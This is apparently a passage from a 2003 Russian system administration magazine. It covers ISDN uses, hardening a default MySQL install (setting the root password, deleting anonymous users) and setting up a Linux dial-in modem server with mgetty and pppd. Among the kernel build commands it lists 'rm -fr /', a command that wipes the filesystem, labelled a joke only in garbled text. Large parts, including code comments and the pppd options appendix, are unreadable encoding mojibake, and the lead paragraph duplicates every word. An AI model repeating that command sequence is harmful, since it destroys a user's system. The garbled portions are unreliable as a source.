интерфейс PRI – 2,048 Мбит/c. Кроме
того, качество цифровых каналов го-
раздо выше аналоговых, а это значит,
что процент искаженных кадров будет
гораздо ниже, полезная скорость об-
мена данными существенно выше.
Обычно интерфейс BRI использует-
ся в коммуникационном оборудовании
для подключения отдельных компьюте-
ров или небольших локальных сетей, а
интерфейс PRI – в маршрутизаторах,
рассчитаных на сети средних размеров.
Что же касается объединения ком-
пьютерных сетей для поддержки служ-
бы с коммутацией пакетов, то здесь
сети ISDN предоставляют не очень
большие возможности.
На каналах типа В режим комму-
тации пакетов поддерживается следу-
ющим образом: либо с помощью по-
стоянного соединения с коммутатором
сети Х.25, либо с помощью коммути-
руемого соединения с этим же комму-
татором. То есть каналы типа В в се-
тях ISDN являются только транзитны-
ми для доступа к “настоящей” сети
Х.25. Собственно, это сводится к пер-
вому случаю использования сети ISDN
– только как сети с коммутацией ка-
налов.
Выводы
Сети ISDN не рассматриваются разра-
ботчиками корпоративных сетей как
хорошее средство для создания маги-
стральных сетей. Основная причина –
отсутствие скоростной службы комму-
тации пакетов и невысокие скорости
каналов, предоставляемые конечным
пользователям. Для целей же подклю-
чения мобильных и домашних пользо-
вателей, небольших филиалов и обра-
зования резервных каналов связи сети
ISDN сейчас используются очень ши-
роко. Производители коммуникацион-
ного оборудования выпускают широ-
кий спектр продуктов для подключе-
ния локальных сетей к ISDN: терми-
нальные адаптеры, удаленные мосты
и офисные маршрутизаторы невысо-
кой стоимости.

Конфигурация MySQL
«по умолчанию»
При запуске MySQL «читает» на-
стройки из файла конфигурации.
Под Unix это могут быть файлы:

/etc/my.cnf;

DATADIR/my.cnf;

defaults-extra-file;

~/.my.cnf.
DATADIR – директория данных MySQL
(обычно это /usr/local/mysql/data при
установке из бинарников или /usr/
local/var при установке из исходников).
Под Windows (начиная с версии
3.22):

windows-system-directory\my.ini;

C:\my.cnf.
В этом файле в том числе пропи-
сывается пользователь root.
ВНИМАНИЕ!

По умолчанию пароль для root НЕ
установлен! УСТАНОВИТЕ ЕГО!
...
user=root
password=âàø_íîâûé_ïàðîëü

Так как под Windows отсутствует
механизм регулирования того, от-
куда и куда можно устанавливать
соединения, ваш MySQL оказыва-
ется открыт всему миру! Эту ситу-
ацию следует изменить (через ус-
тановку и настройку firewall, встро-
енным фильтратором пакетов на
сетевой карте или иным способом)!
Установка пароля для
пользователя root в MySQL
Так как установка MySQL по умолча-
нию производится максимально от-
крытой, первое, что вы должны сде-
лать, – определять пароль для пользо-
вателя root в MySQL.
Вы можете сделать это следую-
щим образом:
shell> mysql -u root mysql
mysql> SET PASSWORD FOR
root@localhost=PASSWORD('new_password');
Если вы достаточно уверены в сво-
их действиях, вы можете непосред-
ственно манипулировать таблицами
привилегий:
shell> mysql -u root mysql
mysql> UPDATE user SET
Password=PASSWORD(“new_password”)
№2(3), февраль 2003
WHERE user=’root’;
mysql> FLUSH PRIVILEGES;
Другой путь устанавливать пароль –
использование команды mysqladmin:
shell> mysqladmin -u root password
new_password
Как только пароль для пользователя
root будет установлен, вы должны ис-
пользовать этот пароль при подклю-
чении к MySQL-серверу от имени root!
Изменять пароль для других
пользователей могут только пользо-
ватели с правом доступа для записи
и обновления к базе данных mysql.
Все «нормальные» пользователи
(т.е. не являющиеся анонимными) мо-
гут только изменить свой собственный
пароль с помощью описанных выше
команд или с помощью команды:
mysql> SET PASSWORD=PASSWORD('new
password');
Имейте в виду, что если вы кор-
ректируете пароль непосредственно
в таблице user, вы должны дать сер-
веру команду перечитать таблицы
привилегий:
mysql> FLUSH PRIVILEGES;
– в противном случае изменений не
произойдет!
Первичная настройка
привилегий в MySQL
под Windows
Так как установка MySQL по умолча-
нию производится максимально от-
крытой, первое, что вы должны сде-
лать – определять пароль для пользо-
вателя root и удалить анонимного
пользователя в MySQL.
Вы можете сделать это следую-
щим образом:
ïóòü_ê_äèðåêòîðèè_MySQL\bin> mysql
mysql
mysql> DELETE FROM user WHERE
Host='localhost' AND User='';
mysql> QUIT
ïóòü_ê_äèðåêòîðèè_MySQL\bin>mysqladmin
reload
ïóòü_ê_äèðåêòîðèè_MySQL\bin>mysqladmin
-u root password your_password
После того как вы установили па-
роль для пользователя root, вы долж-
ны использовать его при обращении
к серверу, как root. Например:
FAQ MySQL
ïóòü_ê_äèðåêòîðèè_MySQL\bin>mysqladmin
--user=root --password=your_password
shutdown
ВНИМАНИЕ! Рекомендую также
удалить всех анонимных пользовате-
лей и пользователей с неустановлен-
ным паролем!
Дело в том, что по умолчанию при
установке создается НЕ ТОЛЬКО root
и анонимный пользователь для
localhost!
Host User Password ...
---- ---- --------
...
% root
%
Значение % в столбце Host озна-
чает «любой» – вам это надо? Думаю,
нет, так что:
ïóòü_ê_äèðåêòîðèè_MySQL\bin> mysql -
uroot -pyour_password mysql
mysql> DELETE FROM user WHERE User='';
mysql> DELETE FROM user WHERE
Password='';
mysql> QUIT
ïóòü_ê_äèðåêòîðèè_MySQL\bin>
mysqladmin -uroot -pyour_password reload
Создание баз данных
и доступ к ним для
отдельных проектов
Вообще работать из-под пользовате-
ля root – «дурной тон» и крайне небе-
зопасное дело.
Поэтому рекомендую создавать
отдельную базу данных и отдельного
пользователя для каждого рабочего
проекта.
Операция это несложная, делать
это нужно из-под пользователя root:
mysql> CREATE DATABASE mydatabase_name;
mysql> GRANT ALL PRIVILEGES ON
mydatabase_name.* TO user_name@host_name
IDENTIFIED BY 'password';
где:

user_name – имя пользователя;

host_name – хост, с которого бу-
дет производиться соединение
(может быть, localhost);

password – пароль, с которым бу-
дет производится соединение.
25
администрирование

КАК ПИНГВИН
ГОВОРИТ ПО
ТЕЛЕФОНУ,
ИЛИ НАСТРОЙКА
DIALIN-СЕРВЕРА
ДЛЯ ДОСТУПА В
ИНТЕРНЕТ
И АВАРИЙНОЙ
КОНСОЛИ
АНДРЕЙ МОЗГОВОЙ
ОО том,
том, как
как настроить
настроить вв Linux
Linux модемное
модемное соединение,
соединение, уже
уже написано
написано большое
большое количество
количество статей.
статей.
Но
Но согласитесь,
согласитесь, что
что когда
когда приходится
приходится настраивать
настраивать какой-нибудь
какой-нибудь модем,
модем, будь
будь то
то входящее
входящее или
или
исходящее
исходящее соединение,
соединение, все
все равно
равно приходится
приходится открывать
открывать пару-тройку
пару-тройку документаций,
документаций, чтобы
чтобы
разобраться
разобраться во
во всем
всем практически
практически сс самого
самого начала.
начала. После
После прочтения
прочтения этой
этой статьи
статьи ситуация
ситуация не
не
изменится.
изменится. Настоящая
Настоящая статья
статья не
не претендует
претендует на
на оригинальное
оригинальное решение
решение поставленной
поставленной задачи,
задачи,
но
но это
это практически
практически готовое
готовое решение
решение попо настройке
настройке dialin-сервера.
dialin-сервера.

26

«Аварийная консоль» – название за-
вораживающее, но в мире реально-
сти это всего лишь консоль, в кото-
рую можно попасть благодаря тому
же модемному соединению. Кстати,
она (консоль) становится действи-
тельно аварийной, когда доступ к
вашему любимому серверу по ка-
ким-либо причинам невозможен че-
рез сеть, а вам срочно надо что-то
поправить или проверить. Один
только пример удаленного админи-
стрирования чего стоит... Я имею в
виду небольшую сеть без «подсту-
па» в Интернет.
Доступ в Интернет
Выражение «доступ в Интернет» в
этой статье представляется так:
пользователь ввел номер телефона,
логин и пароль, нажал кнопку “OK”,
послушал веселую трель модема и
попал (по-настоящему попал) во
всемирную паутину байтов, прово-
дов, серверов, а главное – инфор-
мации. Кстати, главный девиз насто-
ящих хакеров – не тех, что читают
от корки до корки журнал «Хакер»,
и даже не тех, которым удалось-таки
стащить пароли других пользовате-
лей, воплощая в жизнь советы жур-
нала. Судите сами, ведь не так дав-
но прошла новость, что пара таких
кулхацкеров получила срок. На что
надеялись? Думали, что на их АТС
нет определителя номера! Кхм,
кхм... Вернемся к нашим баранам,
главный девиз настоящих хакеров:
«Информация должна быть свобод-
ной». Можете сами в этом убедить-
ся, прочитав замечательный пере-
вод книги «Hackers, heroes of
computer revolution», доступный в
Интернете по адресу http://
cooler.irk.ru/hackers/. И если вам не
хочется платить за качественный
Интернет по модему, вы можете на-
строить dialin-сервер в вашем офи-
се. Пусть не такой быстрый, но бес-
платный. Почему не такой быстрый?
Все просто. Даже если на вашем мо-
деме красуется надпись “56k”, это не
значит, что модем полностью ис-
пользует эту скорость. Дело в том,
что 56k модем (стандартный модем
типа «Курьер») может только прини-
мать, но никак не посылать. Следо-
вательно, максимальная скорость
соединения будет 33.6k. Но этого
№2(3), февраль 2003
вполне достаточно, если учесть, что
не надо платить за пользование мо-
демным пулом. Хочу заметить, что
у меня сервер имеет 18 модемов. Та-
кое количество портов обеспечили
две мультипортовки от Digiboard.
Полусухая теория
Назвать окончательно настроенный
сервер полноценным модемным пу-
лом не поворачивается язык. Но все
же. Для начала нам понадобится
компьютер, подойдет практически
любой – тут уж на ваш выбор. Опе-
рационная система Linux. Я исполь-
зую дистрибутив Slackware (http://
www.slackware.com), этот дистрибу-
тив действительно достоин звания
Linux. Приятная загрузка в стиле
BSD, а самое главное – все можно
подогнать напильником (а то и раш-
пилем, админы поймут). Описанная
ниже настройка при понимании про-
исходящего будет работать и на ос-
тальных дистрибутивах Linux и, ду-
маю, на всех остальных системах,
куда портирован pppd (FreeBSD и т.
д.). Модем посоветую тот, который
хорошо держит линию. Поймите
меня правильно, конкретизировать
здесь сложно. Разве что только не
winmodem. Куда цеплять? На Com-
порт. То, что у меня стоят мультипор-
товки, а у вас нет – особого значе-
ния не имеет, т.к. в системе это все-
го лишь «имена файлов». Другое
дело, если вам надо выбрать муль-
типортовку. Тут критерий тоже не
особо сложен – чтоб в Linux (или что
у вас там) поддерживалась. Мой вы-
бор Digiboаrd. О его настройках могу
сказать – все пучком. Есть файл ин-
терактивной настройки, в котором
все настраивается и прописывается.
В результате подгружаются необхо-
димые модули и появляются новые
девайсы в /dev. Я же сказал – все
пучком.
Имеем: компьютер, ОС и подклю-
ченный модем. Что дальше? А даль-
ше – программная часть. В теории это
выглядит так: работает машина, ви-
сит включенный модем. Один про-
граммный пакет инициализирует мо-
дем и обрабатывает входящие звон-
ки. Решает, что «отдать» абоненту:
консоль или Интернет. Консоль отда-
ется стандартными средствами, а Ин-
тернет с помощью второго ПО. Паке-
администрирование
ты – как вы, наверное, уже догада-
лись – mgetty и pppd соответственно.
Настройка
Как Linux начинается с ядра, так и
настройка его начинается с ядра.
Думаю, что подробное описание на-
стройки ядра выходит за рамки дан-
ной статьи, так что отмечу в общих
чертах. Убедитесь, что присутству-
ет поддержка последовательных
портов (обычно установлена, да и
если вы используете мультипортов-
ку, которую понимает ядро без до-
полнительных модулей, естественно
включите ее поддержку), поддерж-
ка консоли на последовательных
портах, pppd лучше не включать в
ядро, а поддержать модулем (потом
не забудьте подгрузить необходи-
мые модули). Сохраняем изменения,
и собираем:
'make dep && make clean bzImage'
'make modules && make modules_install'
'make bzlilo' - íó èëè ÷òî ó âàñ òàì
'rm -fr /' - øóòêà
'reboot'
Идем дальше... Самое время на-
строить мультипортовку. Если она
не поддерживается в стабильном
последнем ядре Linux, а производи-
тель заявил что карточка “Linux
compatible” – найдите на homesite
производителя драйвера... Тут я вам
не в силах помочь. Главное – опре-
делите имена устройств в системе,
куда подключен модем.
Добрались до mgetty. Изначаль-
но этот пакет написан для подклю-
чения факса, но используется так же
для dialin-серверов, особенно с по-
явлением возможности AutoPPP (ав-
томатического определения ppp-со-
единения).
if (ïàêåò óæå óñòàíîâëåí) {
Óáåäèòåñü, ÷òî îí ñîáðàí ñ ïàðàìåòðîì
-DAUTO_PPP.
} else {
Ñêà÷èâàåì ïîñëåäíþþ âåðñèþ mgetty ñ
äîìàøíåãî ñàéòà (http://
alpha.greenie.net/mgetty/), ðàñïàêîâû-
âàåì è ñîáèðàåì ñ ïàðàìåòðîì -DAUTO_PPP.
Ïðîöåññ ñáîðêè õîðîøî îïèñàí â ôàéëå
README.1st, íî íåò íè÷åãî ïëîõîãî îïè-
ñàòü íåîáõîäèìûå íàì äåéñòâèÿ çäåñü.
Âî-ïåðâûõ, íàäî ñêîïèðîâàòü ôàéë
'policy.h-dist' â 'policy.h'.
Âî-âòîðûõ, îòðåäàêòèðîâàòü ôàéë
'Makefile', äîáàâèâ â íåãî çàâåòíûé
ïàðàìåòð. Ôëàã çàäàåòñÿ êîìïèëÿòîðó â
110-é ñòðîêå.
Îòêðûâàåì ôàéë â ðåäàêòîðå, äëÿ êîãî
â ÷åì óäîáíåå, ÿ èñïîëüçóþ joe, ñïóñêà-
27
 администрирование
åìñÿ íà íóæíóþ ñòðîêó è äîáàâëÿåì:
-DAUTOPPP
ïîëó÷àåòñÿ:
'CFLAGS=-O2 -Wall -pipe -DAUTO_PPP'
Âû ìîæåòå äîáàâèòü åùå ÷òî-íèáóäü ïî
âêóñó, íî ýòî îñíîâíîå. Êñòàòè, â çàâè-
ñèìîñòè îò OS ñòðîêà ìîæåò âèäîèçìå-
íèòüñÿ(ñì. êîììåíòàðèè). Òåïåðü ñîáèðà-
åì è, åñëè âñå â ïîðÿäêå, èíñòàëëèðóåì:
'make && make install'
}
Установим pppd:
if (ïàêåò óæå óñòàíîâëåí) {
Ïðè íàñòðîéêå ñâîåãî ñåðâåðà ÿ èñ-
ïîëüçîâàë âåðñèþ, ïîñòàâëÿåìóþ â êîì-
ïëåêòå c äèñòðèáóòèâîì. Òàê ÷òî åñëè ó
âàñ óæå óñòàíîâëåí ýòîò ïàêåò, óáåäè-
òåñü ðàçâå ÷òî â åãî «ñâåæåñòè».
} else {
Äîìàøíèé ñàéò pppd ðàñïîëàãàåòñÿ
ïî àäðåñó (http://www.samba.org/ppp/).
Çàáèðàåì ïîñëåäíþþ âåðñèþ – pppd-2.4.1
(íà ìîìåíò íàïèñàíèÿ ñòàòüè). Ðàñïàêî-
âûâàåì.
 ìîåì äèñòðèáóòèâå ïàêåò ñîáðàí ñëå-
äóþùèì îáðàçîì. Äîáàâëåíà ïîääåðæêà
callback'a
'zcat ppp-cbcp.diff.gz | patch -p0
—backup —suffix=.orig'
'zcat ppp.time.diff.gz | patch -p1
—backup —suffix=.orig'
'./configure'
'make && make install'
} второго гудка. Если нет – добейтесь
Понятно, что инициализировать
модем будет mgetty. Как это органи-
зовать – вопрос творческий. Можно
каждый раз вводить... Точнее, можно
настроить mgetty так, чтоб он иници-
ализировал модем, вводя длинную
строку инициализации. Я выбрал не-
сколько иной путь. Зашел в модем
терминалом, ввел необходимую мне
строку инициализации и записал ее в
память, которая энергонезависима,
следовательно, не боится перебоя пи-
тания. Терминал любой, хоть Hyper
Terminal (win32), minicom (linux). Стро-
ка инициализации на ваш вкус, по ад-
ресу http://www.usrsupport.ru/, если я
не ошибаюсь, вы найдете все вам не-
обходимое об инициализации. Я на-
ходил даже записи трелей модемов
при соединении по разным протоко-
лам!!! (хотя это к делу не относится).
Как выглядит строка инициализации,
зависит от марки вашего модема. В
своих «Курьерах» я вводил:
--- ÂÂÎÄ ---
ATZ OK
AT&F1 OK
ATC10=17 OK
AT&F1 OK
AT&P1 OK
AT&W OK
--- EOF ---
Главное, определитесь, как хоти-
28
те настроить модем, и ищите нужные
вам регистры. Кстати, очень сильно
может помочь документация, которая
идет в комплекте с модемом. Основ-
ные критерии можно свести к вопро-
су: «С какого звонка снимать труб-
ку?». Дерзайте, только после на-
стройки не забудьте записать изме-
нения регистров с помощью коман-
ды “AT&W”. Впоследствии это нам
пригодится. После этого инициализи-
ровать модем можно по “ATZ”. Эта ко-
манда «вытащит» из памяти то, что
вы записали по “AT&W”. Понятие о
памяти дано в общих чертах.
К этому моменту у вас уже дол-
жен быть настроен модем. Допус-
тим, он должен брать трубку со вто-
рого звонка (S0=2). Проверьте это.
Для убедительности выключите и
включите модем, зайдите на него
терминалом, скажите “ATZ”, затем
организуйте звонок на модем с дру-
гого номера. Должен поднять после
желаемого результата, так как от
этого зависит дальнейшая настрой-
ка сервера.
Имея настроенный модем, мож-
но браться за настройку mgetty.
Ищем, куда же он установлен... На-
ходим конфиг урационный файл
mgetty.config (конечно, если вы пе-
реопределили имя файла в policy.h
при сборке – ищем указанное вами
имя). В mgetty у меня всего две
строчки:
--- mgetty.config ---
data-only y
init-chat "" AT OK ATZ OK
--- mgetty.config ---
Хотя в этом файле так же можно
задать скорость соединения (насколь-
ко я понял, лучше ставить как можно
больше, 57 600 или 115 200, посколь-
ку это скорость соединения модема с
машиной, а не с пользователем), уро-
вень отладки, но мне удобнее такие
параметры задать в /etc/inittab (см.
ниже). Кстати, вспомните, что я гово-
рил о “ATZ”.
Следующий необходимый нам
файл – login.config.
--- login.config ---
/AutoPPP/ - pppd /usr/
sbin/pppd file /etc/ppp/options
* - - /bin/
login @
--- login.config ---
Первая строка определяет, что
делать с входящими ppp-соединени-
ями. Вторая – как раз и есть аварий-
ная консоль. Вызвать ее можно, ус-
тановив соответственную галочку (в
win32) о выводе терминала после
соединения. Что мы и будем исполь-
зовать для тестирования. Избавить-
ся от этой консоли можно, указав
вместо “/bin/login” что-нибудь лож-
ное – “/bin/fasle” или “/dev/null”.
Как запускать mgetty? Те, кто ис-
пользует единственную телефонную
линию офиса, могут установить под-
нятие трубки с 5-6 звонка (будьте ос-
торожны – этому есть предел) или
поднимать mgetty в нерабочее вре-
мя с помощью crond. Так же надо
учесть, что после разрыва соедине-
ния процесс mgetty должен быть под-
нят заново. У меня сервер выделен
отдельно, так и линии выделены спе-
цом под dailin, следовательно, все
работает круглосуточно. Получает-
ся, и mgetty надо держать поднятым
круглосуточно. Для этого удобнее
всего использовать initd. Он сам под-
нимет модемы при загрузке серве-
ра и после разрыва соединения.
Файл конфиг урации /etc/inittab.
Ниже приведены строки, относящи-
еся к модемам. Думаю, лучше всего
их прописать после консолей.
--- inittab ---
D005:345:respawn:/usr/local/sbin/
mgetty -s 57600 /dev/ttyD005 ttyD005
D006:345:respawn:/usr/local/sbin/
mgetty -s 115200 /dev/ttyD006 ttyD006
--- inittab ---
Формат строк прост:
id:runlevels:action:process
Подробней – в man inittab. Первая стро-
ка относится к модему «Курьер», вто-
рая – к стоечным «Зюксилям», у них
разные скорости. В параметрах mgetty
можно указать уровень отладки. Напри-
мер, чтобы писались лог-файлы по каж-
дому модему в отдельный файл, что
удобно при отладке, добавьте «-x 5».
Да, и учтите, что у меня на борту
есть мультипортовки. Т.е. если у вас
нет мультипортовки и модем висит
на Com2, скорее всего, строка будет
выглядеть примерно так:
's1:12345:respawn:/usr/local/sbin/
mgetty -s 57600 /dev/ttyS1 ttyS1'

Тестирование
Один из приятных моментов статьи.
Если вы сделали все правильно, пе-
резагрузите initd (“init q”). Должны
увидеть, как поднимутся модемы. По-
скольку pppd мы еще не настраива-
ли, тестировать можно только ава-
рийную консоль. Думаю, вы понима-
ете, что если тестировать консоль, то
в “/bin/login” указан “/bin/login” (или
типа того), а галочка о выводе тер-
минала после установки соединения
установлена. Да, чуть не забыл.

Пользователи, которые мог ут
входить через аварийный вход,
должны быть прописаны в систе-
ме (/etc/passwd), а пользователи,
использующие pppd (Интернет),
должны быть прописаны в соот-
ветствующих файлах настройки
pppd (при pap-авторизации /etc/
ppp/pap-secrets, при chap – /etc/
ppp/chap-secrets).

В виндах настройте модемное со-
единение. Звоним... модем берет
трубу после нужного гудка, уста-
навливается соединение и выва-
ливается окно терминала. Введя
в терминале ligin&password, дол-
жны увидеть любимый shell. Если
что-то не получилось, не пани-
куйте. Посмотрите лог-файлы,
уверен, найдете все ответы.
Кстати, в будущем, имея настро-
енный pppd, мы так же будем про-
верять и его работу с помощью
этого соединения. После того как
получили shell, можно запустить
“pppd”, затем клавишу “F7” для
закрытия терминала и продолже-
ния работы, но уже в Интернете
(pppd должен быть настроен).
Настройка pppd
Это второй творческий вопрос. Есть
масса вариантов, настройки. Так,
например, каждый пользователь мо-
жет иметь свой IP-адрес или каж-
дый модем может иметь свой IP.
Можно организовать определитель
номера (вопрос к mgetty), используя
его, настроить callback. Авторизация
PAP, CHAP или скрипты. Опишу, как
сделал сам и постараюсь затронуть
другие варианты. Обратите внима-
ние на одну важную деталь – pppd
должен иметь возможность запус-
каться от пользователя. Если вам не
удастся решить это настройкой са-
№2(3), февраль 2003
мого демона, установите привиле-
гию на запуск от владельца файла
(uid).
Биллинг пользователей модемного
пула сделан на основе выходных дан-
ных самого pppd, поэтому мне неприн-
ципиально, чтобы каждый пользова-
тель имел свой IP-адрес (=> каждый
модем имеет свой IP). Конфигураци-
онный файл pppd – /etc/ppp/options. Ли-
стинг файла легче смотреть с помо-
щью “egrep -v”#|^ *$’ /etc/ppp/options’,
так печатаются только незакомменти-
рованные строки:
--- /etc/ppp/options ---
192.168.1.1:
ms-dns <primary dns server ip>
ms-dns <scondary dns server ip>
ms-wins <primary wins server ip>
ms-wins <secondary wins server ip>
asyncmap 0
auth
crtscts
lock
modem
-detach
+pap
-chap
debug
usehostname
proxyarp
lcp-echo-interval 30
lcp-echo-failure 4
--- /etc/ppp/options ---
Первая строка – это IP-адрес
сервера, на котором висит модем, и
клиента, который дозвонился на
сервер. Формат строки:
<server ip addr>:<client ip addr>
как видите, я задаю IP-адрес толь-
ко для сервера. Для клиентов, точ-
нее, для модемов IP-адреса заданы
в отдельных файлах, имена кото-
рых соответс твуют именам уст-
ройств, к которым подключены мо-
демы. У меня так:
--- ls -1 ---
options
options.ttyD000
options.ttyD001
options.ttyD002
...
--- ls -1 ---
Если у вас нет мультипортовки,
а модемов, допустим, только два, на
первом и втором com-портах, фай-
лы будут:
îáðàçîì:
--- cat options.ttyS0 ---
:192.168.1.2 – äâîåòî÷èå îáÿçàòåëüíî!
--- cat options.ttyS0 ---
администрирование
Кстати, если у вас всего один мо-
дем, то никто не запретит вам ука-
зать IP-адрес для него прямо в /etc/
ppp/options. Продолжая тему выдачи
IP-адреса, замечу, что если вы жела-
ете выдавать каждому пользователю
по своему IP-адресу, его (IP) нужно
указать в четвертом столбце файла
авторизации /etc/ppp/pap-secrets или
/etc/ppp/chap-secrets. Строка “auth”
как раз и требует, чтоб пользователь
сначала ввел логин и пароль для
регистрации, только потом pppd по-
зволит войти в сеть. Строки “+pap”
и “-chap” означают использовать
только pap-авторизацию. Листинг
pap-secrets:
--- cat pap-secrets ---
# Secrets for authentication using PAP
#client server secret ip-addr
test * passfortest *
test1 * passfortest1 *
--- cat pap-secrets ---
Если в качестве пароля указать
“«»” (две двойные кавычки), pppd по-
старается найти пароль в системной
базе данных паролей. Проще гово-
ря – в /etc/shadow.
Полный перевод комментариев
файла /etc/ppp/options смотрите в
приложении. Большое спасибо авто-
ру перевода, к сожалению, не знаю
его имени.
На этом и заканчивается вся на-
стройка модемного пула. Присту-
пайте к тестированию, ищите ошиб-
ки в логах.
Возникшие вопросы вы можете
задать в форуме домашнего сайта
журнала, в разделе «Вопросы чита-
телей к авторам» (URL: ht tp://
www.samag.ru/cgi-bin/yabb/
YaBB.pl?board=answer_cat) + (лучше
пишите на форум, чем на почту).
Незатронутой осталась тема под-
счета статистики пользователей.
Могу натолкнуть на мысль: man pppd
(раздел SCRIPTS). Будет время –
опишу пример построения биллинга,
основанный на выполнении этих
скриптов. Лучше, конечно пропат-
чить сам pppd, но все же...
Как говорит один мой знакомый
системный администратор, читайте
доки – они рулез (с). Да прибудет с
вами сила.
Далее идет описание файла /etc/
ppp/options.
29
администрирование
ПРИЛОЖЕНИЕ:
перевод файла
/etc/ppp/options
# Èñïîëüçîâàòü óêàçàííóþ êîìàíäó èëè
# ïðîãðàììó äëÿ íàñòðîéêè ëèíèè. Ýòîò
# îáû÷íî èñïîëüçóåò ïðîãðàììó "chat",
# ÷òîáû ïîçâîíèòü ìîäåìîì è çàïóñòèòü
# óäàëåííóþ ppp-ñåññèþ.
#connect "echo
# âàì íóæíî óñòàíîâèòü êîìàíäó connect."
# Çàïóñòèòü óêàçàííóþ êîìàíäó èëè
# ïðîãðàììó, êîãäà pppd çàâåðøèë ñâÿçü.
# Ýòîò ñêðèïò ìîã áû, ê ïðèìåðó, ââåñòè
# êîìàíäû â ìîäåì, ÷òîáû çàâåðøèòü
# ñâÿçü, åñëè ñèãíàëû àïïàðòíîãî
# óïðàâëåíèÿ ìîäåìîì íåäîñòóïíû.
#disconnect "chat — \d+++\d\c OK ath0
OK"
# async êàðòà ñèìâîëîâ — 32-bit hex;
# êàæäûé áèò - ñèìâîë, êîòîðûé íàäî
# ïðåäñòàâèòü â âèäå escape-
# ïîñëåäîâàòåëüíîñòè, ÷òîáû pppd ìîã
# åãî ïðèíÿòü.
# 0x00000001 - ýòî ìàñêà äëÿ '\x01',
# à 0x80000000 - ìàñêà äëÿ '\x1f'.
#asyncmap 0
# Òðåáîâàíèå äëÿ óäàëåííîé ñòîðîíû
# íàçâàòü ñåáÿ, ïåðåä òåì êàê íà÷íåòñÿ
# îáìåí ïàêåòàìè.
#auth
# Èñïîëüçîâàòü àïïàðàòíîå óïðàâëåíèå
# ïîòîêîì äàííûõ (íàïð., RTS/CTS),
# ÷òîáû óïðàâëÿòü ïîòîêîì äàííûõ íà
# ïîñëåäîâàòåëüíîì ïîðòó.
#crtscts
# Èñïîëüçîâàòü ïðîãðàììíîå óïðàâëåíèå
# ïîòîêîì äàííûõ (íàïð., XON/XOFF),
# ÷òîáû óïðàâëÿòü ïîòîêîì äàííûõ íà
# ïîñëåäîâàòåëüíîì ïîðòó.
#xonxoff
# Äîáàâèòü ìàðøðóò ïî óìîë÷àíèþ
# â ñèñòåìíóþ òàáëèöó ìàðøðóòèçàöèè,
# èñïîëüçóÿ óäàëåííóþ ñòîðîíó êàê øëþç,
# êîãäà äîãîâîðåííîñòü IPCP óñïåøíî
# äîñòèãíóòà. Ýòà çàïèñü óäàëÿåòñÿ
# ïðè çàâåðøåíèè ñâÿçè.
#defaultroute
# Îïðåäåëÿåò, ÷òî íåêîòîðûå ñèìâîëû
# äîëæíû áûòü çà'escape'ëåíû ïðè ïå-
# ðåäà÷å (íåçàâèñèìî îò òîãî, ïðîñèëà
# ëè óäàëåííàÿ ñòîðîíà èõ escape'èòü
# ñâîåé async êàðòîé óïðàâëÿþùèõ
# ñèìâîëîâ). Ñèìâîëû, êîòîðûå íàäî
# escape'èòü, óêàçûâàþòñÿ â âèäå ñïèñêà
# øåñòíàäöàòåðè÷íûõ ÷èñåë, ðàçäåëåí-
# íûõ çàïÿòûìè. Çàìåòüòå, ÷òî äëÿ îï-
# öèè escape ìîãóò áûòü óêàçàíû ïî÷òè
# âñå ñèìâîëû, â îòëè÷èå îò îïöèè
# asyncmap, êîòîðàÿ ïîçâîëÿåò
# óêàçûâàòü òîëüêî óïðàâëÿþùèå
# ñèìâîëû. Ñèìâîëû, êîòîðûå íåëüçÿ
# escape'èòü - ýòî 0x20 - 0x3f
# èëè 0x5e.
#escape 11,13,ff
# Íå èñïîëüçîâàòü ëèíèè óïðàâëåíèÿ
# ìîäåìîì.
#local
# Óêàçûâàåò, ÷òî pppd äîëæåí
# èñïîëüçîâàòü lock â ñòèëå UUCP íà
# ïîñëåäîâàòåëüíîå óñòðîéñòâî, ÷òîáû
# èñêëþ÷èòü îäíîâðåìåííûé äîñòóï ê
# óñòðîéñòâó.
#lock
# Èñïîëüçîâàòü ëèíèè óïðàâëåíèÿ
# ìîäåìîì. Íà Ultrix ýòà îïöèÿ
30
# îçíà÷àåò óïðàâëåíèå ïîòîêîì äàííûõ,
# êàê îïöèÿ crtscts. (Ýòà îïöèÿ íå
# ïîëíîñòüþ âûïîëíÿåòñÿ).
#modem
# Óñòàíîâèòü çíà÷åíèå MRU [Maximum
# Receive Unit] â <n> ïðè äîãîâîðåí-
# íîñòè.
# pppd çàïðîñèò óäàëåííóþ ñòîðîíó îò-
# ïðàâëÿòü ïàêåòû íå áîëåå ÷åì ïî
# <n> áàéò.
# Ìèíèìàëüíîå çíà÷åíèå MRU – 128.
# Çíà÷åíèå MRU ïî óìîë÷àíèþ – 1500.
# Äëÿ ìåäëåííûõ ëèíêîâ ðåêîìåíäóåòñÿ
# 296 (40 áàéò äëÿ çàãîëîâêà TCP/IP +
# 256 áàéò äàííûõ).
#mru 542
# Óñòàíîâèòü ñåòåâóþ ìàñêó èíòåðôåéñà
# â <n>, 32-áèòíàÿ ñåòåâàÿ ìàñêà â
# "äåñÿòè÷íî-òî÷å÷íîé" íîòàöèè (íàïð.
# 255.255.255.0).
#netmask 255.255.255.0
# Çàïðåòèòü ïîâåäåíèå ïî óìîë÷àíèþ,
# êîãäà íå óêàçàí ëîêàëüíûé IP-àäðåñ,
# êîòîðîå îïðåäåëÿåò (åñëè âîçìîæíî)
# ëîêàëüíûé IP-àäðåñ ïî èìåíè õîñòà.
# Ñ ýòîé îïöèåé óäàëåííàÿ ñòîðîíà
# äîëæíà áóäåò îáåñïå÷èòü ëîêàëüíûé
# IP-àäðåñ â òå÷åíèå IPCP-ïåðåãîâîðîâ
# (åñëè îíà íå îïðåäåëåíà ÿâíî â
# êîìàíäíîé ñòðîêå èëè â ôàéëå
# options).
#noipdefault
# Ðàçðåøèòü îïöèþ "passive" â LCP.
# Ñ ýòîé îïöèåé pppd áóäåò ïûòàòüñÿ
# èíèöèèðîâàòü ñîåäèíåíèå; åñëè îòâåò
# îò äðóãîé ñòîðîíû íå ïðèíÿò, òî
# pppd áóäåò ïàññèâíî îæèäàòü
# ïðàâèëüíûé LCP-ïàêåò îò äðóãîé
# ñòîðîíû (âìåñòî âûõîäà, êàê äåëàåòñÿ
# áåç ýòîé îïöèè).
#passive
# Ñ ýòîé îïöèåé pppd íå áóäåò
# ïåðåäàâàòü LCP-ïàêåòû äëÿ èíèöèàöèè
# ñîåäèíåíèÿ, ïîêà íå ïðèäåò
# ïðàâèëüíûé LCP-ïàêåò îò äðóãîé
# ñòîðîíû (êàê îïöèÿ "passive"
# â ñòàðûõ âåðñèÿõ pppd).
#silent
